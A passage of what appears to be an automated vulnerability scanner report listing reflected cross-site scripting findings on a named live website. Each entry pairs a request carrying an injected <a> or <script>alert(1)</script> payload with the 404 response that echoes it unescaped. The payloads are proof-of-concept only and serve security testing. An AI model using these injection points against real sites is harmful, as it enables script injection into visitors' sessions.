This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search9db63<a>f85b132a3ce&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search9db63<a>f85b132a3ce&opt=2 was not found on this server.</p>
...[SNIP]...

2.3337. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ef2be<a>e5c7d42dfda was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...ef2be<a>e5c7d42dfda&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...ef2be<a>e5c7d42dfda&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3338. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0d91<script>alert(1)</script>ff27fe332c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e0d91<script>alert(1)</script>ff27fe332c6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e0d91<script>alert(1)</script>ff27fe332c6=1 was not found on this server.</p>
...[SNIP]...

2.3339. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 58934<a>909195622ff was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=258934<a>909195622ff HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=258934<a>909195622ff was not found on this server.</p>
...[SNIP]...

2.3340. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cd23<script>alert(1)</script>e8f23ee4a6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7cd23<script>alert(1)</script>e8f23ee4a6c/46/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7cd23<script>alert(1)</script>e8f23ee4a6c/46/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3341. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6045a<script>alert(1)</script>ec200d00e7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/466045a<script>alert(1)</script>ec200d00e7c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/466045a<script>alert(1)</script>ec200d00e7c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3342. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d6be4<script>alert(1)</script>b36351f728f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesd6be4<script>alert(1)</script>b36351f728f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesd6be4<script>alert(1)</script>b36351f728f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3343. http://www.resellerbase.com/detail/46/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4298<script>alert(1)</script>a09214cee94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/search.phpe4298<script>alert(1)</script>a09214cee94?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.phpe4298<script>alert(1)</script>a09214cee94?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3344. http://www.resellerbase.com/detail/46/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ab348<a>bee214041f9 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Searchab348<a>bee214041f9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...&Submit3=Searchab348<a>bee214041f9&opt=2 was not found on this server.</p>
...[SNIP]...

2.3345. http://www.resellerbase.com/detail/46/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload cc818<a>de71f8f5232 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/search.php?keyword=search...cc818<a>de71f8f5232&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...cc818<a>de71f8f5232&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3346. http://www.resellerbase.com/detail/46/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c6680<script>alert(1)</script>9710810aeee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=2&c6680<script>alert(1)</script>9710810aeee=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=2&c6680<script>alert(1)</script>9710810aeee=1 was not found on this server.</p>
...[SNIP]...

2.3347. http://www.resellerbase.com/detail/46/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8f36b<a>a81c6cb3d25 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=28f36b<a>a81c6cb3d25 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/search.php?keyword=search...&Submit3=Search&opt=28f36b<a>a81c6cb3d25 was not found on this server.</p>
...[SNIP]...

2.3348. http://www.resellerbase.com/detail/5/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54d75<script>alert(1)</script>647f503fd4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail54d75<script>alert(1)</script>647f503fd4a/5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54d75<script>alert(1)</script>647f503fd4a/5/ was not found on this server.</p>
...[SNIP]...

2.3349. http://www.resellerbase.com/detail/5/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91400<script>alert(1)</script>aaa62ac48cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/591400<script>alert(1)</script>aaa62ac48cd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/591400<script>alert(1)</script>aaa62ac48cd/ was not found on this server.</p>
...[SNIP]...

2.3350. http://www.resellerbase.com/detail/5/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5d2e2<script>alert(1)</script>5f1a239f1be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/?5d2e2<script>alert(1)</script>5f1a239f1be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/?5d2e2<script>alert(1)</script>5f1a239f1be=1 was not found on this server.</p>
...[SNIP]...

2.3351. http://www.resellerbase.com/detail/5/myresellerpanel-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/myresellerpanel-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3973<script>alert(1)</script>4da4b5ab3f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc3973<script>alert(1)</script>4da4b5ab3f2/5/myresellerpanel-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc3973<script>alert(1)</script>4da4b5ab3f2/5/myresellerpanel-com.html was not found on this server.</p>
...[SNIP]...

2.3352. http://www.resellerbase.com/detail/5/myresellerpanel-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/myresellerpanel-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 768bf<a>1c24e3b2db6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5768bf<a>1c24e3b2db6/myresellerpanel-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5768bf<a>1c24e3b2db6/myresellerpanel-com.html was not found on this server.</p>
...[SNIP]...

2.3353. http://www.resellerbase.com/detail/5/myresellerpanel-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/myresellerpanel-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93a7b<script>alert(1)</script>3fb77ce6e40 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/93a7b<script>alert(1)</script>3fb77ce6e40 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/93a7b<script>alert(1)</script>3fb77ce6e40 was not found on this server.</p>
...[SNIP]...

2.3354. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cba0<script>alert(1)</script>299da5dbf39e6391f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail9cba0<script>alert(1)</script>299da5dbf39e6391f/5/rating.php?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
